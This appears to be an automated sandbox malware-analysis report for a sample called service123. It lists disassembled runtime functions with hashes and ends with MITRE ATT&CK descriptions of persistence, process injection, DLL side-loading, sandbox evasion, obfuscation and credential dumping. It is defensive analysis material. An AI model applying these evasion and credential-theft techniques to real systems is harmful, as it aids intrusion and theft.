Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 3a7ced1671ce8b438621305ec6ff60ab2b73aba63cb43ea4164e908f14d277b7
Instruction ID: 3ee90365657c277764a1ca38f35e7b578c6476f46fba5e8309e1f3f513f3afaf
Opcode Fuzzy Hash: 3a7ced1671ce8b438621305ec6ff60ab2b73aba63cb43ea4164e908f14d277b7
Instruction Fuzzy Hash: F4F12CB4A05A0ACFC700DFACC4849AEBBF0BF48314B514A69EC95DB754E734E946CB81

Function 006C29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 006C2A31

Strings

NaN, xrefs: 006C29B1

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: c7289b0095f1f0e13e4748ae217f1b78cacc5139830ba605e9e36d8b0b20c72c
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 34410C71604216CBDB24DF59C4D4BA6B7E2EF88710F29829DDC499F34AD732DC428B90

Function 6C223080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C223101

Strings

NaN, xrefs: 6C223081

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: ceb51a9c634bf1269383299b90bae2fd0af33454b6ebe7e714fa7e31453de6e7
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: EF4118B1A056198BDB10CF1CC480785B7E9BF85705B29C699EC488F74AD33ADD468B90

Function 6C2A4DD0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2A4E0A
strlen.MSVCRT ref: 6C2A4E8D
strlen.MSVCRT ref: 6C2A4F10
strlen.MSVCRT ref: 6C2A4F93

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: b5ab21b0cd159d141be8fb66f2775c0addbb7acea26af8644d235c807329a02e
Instruction ID: b2b2b2957fc9d01f32cb038a06810dd7351d2dc110cb8d79f7824bf37de50354
Opcode Fuzzy Hash: b5ab21b0cd159d141be8fb66f2775c0addbb7acea26af8644d235c807329a02e
Instruction Fuzzy Hash: 13E13A70A0560A8FC700DFACC5C49AEFBF1BF48314B148669E855DBB54DB34E94ACB91

Function 6C2A45D0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2A460A
strlen.MSVCRT ref: 6C2A468D
strlen.MSVCRT ref: 6C2A4710
strlen.MSVCRT ref: 6C2A4793

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 618807b0c73bd9d34f19ba50d45c718091eccd4b62ccc59384f031c57212666a
Instruction ID: 77c5c512715e11a48027b59ed43aee844c7191fe8ff73285efa8fb54664e711a
Opcode Fuzzy Hash: 618807b0c73bd9d34f19ba50d45c718091eccd4b62ccc59384f031c57212666a
Instruction Fuzzy Hash: 2BE15974A0564A8FC700DFACC0C4AAEFBF1BF88314B109669E855DB754DB34E906CB91

Function 6C22E1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C22E1FE
strlen.MSVCRT ref: 6C22E211

Strings

basic_string: construction from null is not valid, xrefs: 6C22E233

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: a155aff4509162c22a8b0906e9673b06bf06958df487cf1718ef4fec6e91e48b
Instruction ID: d6fa5f67b7a6735a80b1fc0fb7640a485158ce65341b82d843def9596c2d0762
Opcode Fuzzy Hash: a155aff4509162c22a8b0906e9673b06bf06958df487cf1718ef4fec6e91e48b
Instruction Fuzzy Hash: 14115472A08244DF8700FF3DC94549AB7F5AB9A214F45CA69DC4987708E639D4198FE3

Function 006C2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 006C2E97
fputc.MSVCRT ref: 006C2F07
memset.MSVCRT ref: 006C2FC2

Strings

o, xrefs: 006C2F5E

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 20c4747890c2cabb2b0e446c39fc29ce8ac70a598961a061d78847c224a9cae2
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 0731F9719042068FCB11CF68C1A4BA9BBF2FF58750F15865DDD8AAB701E734E941CB94

Function 6C223616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C223567
fputc.MSVCRT ref: 6C2235D7
memset.MSVCRT ref: 6C223692

Strings

o, xrefs: 6C22362E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: e4cdbf896e0fd5d3cf02d71e70a8cdd62ad26bde2bd4ec031d31d47dbdc92b3c
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: F5313872A0870A8FCB00CF68C180799BBF9BF4C355F158659ED89ABB41E738E915CB40

Function 006C3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 006C338F
fputc.MSVCRT ref: 006C33F1

Strings

@, xrefs: 006C342A

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 6f0fb23588c6b796706f8e2ae32899554dae26a0ee0feb8759ce37f2c280176a
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: F111E7B1A046A08BCB15CF28C184BA97BA2FB45704F25C59DDD8D9F34ADB35ED01CB44

Function 6C223AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C223A5F
fputc.MSVCRT ref: 6C223AC1

Strings

@, xrefs: 6C223AFA

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 97ee0f8ab36b95e6259a633122f433f683aa7af012d92d920ff58c2decbfe7e4
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: A91130B1A15209CBCB00DF28C1C07897BF9BF45305F658669ED996FB4AD338E801CB44

Function 006C18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 006C191E

Strings

Unknown error, xrefs: 006C18B2
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 006C18FF

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: c6b9eddf71b6a0a7161863815d8b74a2b8f49190dd832efa292ac27b5b4f5c7b
Instruction ID: 7fb481738dc0ee30683ac5ca42b287f784ab49c6f441848a41b9058ff562a22d
Opcode Fuzzy Hash: c6b9eddf71b6a0a7161863815d8b74a2b8f49190dd832efa292ac27b5b4f5c7b
Instruction Fuzzy Hash: 7001D670408B45CBD340AF15E48892ABFF2FF8A354F464C9CE5C446269CB32D8A8C747

Function 6C2377B1 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2377D3

Part of subcall function 6C284050: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C2377E6), ref: 6C2840B3

strlen.MSVCRT ref: 6C237844
strlen.MSVCRT ref: 6C2378B2
strlen.MSVCRT ref: 6C237926

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: c8a2a42947b2edb02ec979011cb119a63f0d445eeab1124a6aba2d494e17adea
Instruction ID: 5c7d0f368551a0b5a78482245d6d7482a6257d18b60b33b8a1f5d13ef738f7c8
Opcode Fuzzy Hash: c8a2a42947b2edb02ec979011cb119a63f0d445eeab1124a6aba2d494e17adea
Instruction Fuzzy Hash: AF5126B0A06A14CFDB00EF28C19865DFBF5BF89714F0585ADD855AF760CB35A809CB82

Function 006C6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,006C6C81,?,?,?,?,?,?,00000000,006C4F24), ref: 006C6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,006C6C81,?,?,?,?,?,?,00000000,006C4F24), ref: 006C6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,006C6C81,?,?,?,?,?,?,00000000,006C4F24), ref: 006C6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,006C6C81,?,?,?,?,?,?,00000000,006C4F24), ref: 006C6BF8

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 0d3fdafd6e601bf64ef30b42718bbd16e5b24189765df3caffe569a0d4dea2c9
Instruction ID: e8d7b3dc7d75e5151a4a3b6257142ef27aae0cd41f866ab6410750b1eadcbcb5
Opcode Fuzzy Hash: 0d3fdafd6e601bf64ef30b42718bbd16e5b24189765df3caffe569a0d4dea2c9
Instruction Fuzzy Hash: 26115EB15081408ADB14BB7CE9C9EBA7BE7EB01344F15083DE486C7710EA31ECA4C79A

Function 6C228080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C2281A1), ref: 6C2280A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C2281A1), ref: 6C2280E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C2281A1), ref: 6C2280F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C2281A1), ref: 6C228118

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 80d2c2d54f1aefa4b17fa214f859ee867031d11689d1e0e8572027080a477c25
Instruction ID: ab267235dcf72ed4ddc1804ffccfc769b3629b73c5e6e82f235d5dbe9a2fda84
Opcode Fuzzy Hash: 80d2c2d54f1aefa4b17fa214f859ee867031d11689d1e0e8572027080a477c25
Instruction Fuzzy Hash: 761165B250514DCBDF10AF2C95C6659B7F8EB07314F510526DC46C7640EA35D5D4C793

Function 006C2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,006C21D3,?,?,?,?,?,006C17E8), ref: 006C200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,006C21D3,?,?,?,?,?,006C17E8), ref: 006C2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,006C21D3,?,?,?,?,?,006C17E8), ref: 006C203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,006C21D3,?,?,?,?,?,006C17E8), ref: 006C205C

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: a00b29479834ea010c476b7acfe0d54e152af19159d9d78dc0f7f2d88bd579c6
Instruction ID: 87d27e5b1ac06dd5c289d05745f108863d7b51b72dda00d9da9d2d695ec4f590
Opcode Fuzzy Hash: a00b29479834ea010c476b7acfe0d54e152af19159d9d78dc0f7f2d88bd579c6
Instruction Fuzzy Hash: F2F0A4756003018FDB107F78D884E3A7BB5EA14340F09443DDD4487314D731E816CBA6

Function 6C21AB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C21AB5E
TlsGetValue.KERNEL32 ref: 6C21AB85
GetLastError.KERNEL32 ref: 6C21AB8C
LeaveCriticalSection.KERNEL32 ref: 6C21ABAC

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 78571f3ebc01f947cd180531d82ce7ce63cc79ed2066f1f05b55db9068487c6e
Instruction ID: e9f665af6e2b54000a630fe9c33b20b6b59287d2ef4400659b7825db8ca020e9
Opcode Fuzzy Hash: 78571f3ebc01f947cd180531d82ce7ce63cc79ed2066f1f05b55db9068487c6e
Instruction Fuzzy Hash: A1F0F9B2A04799CFCB107F78C5C554A7BB8EA41264F050264EE4887704D630A608CBA3

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
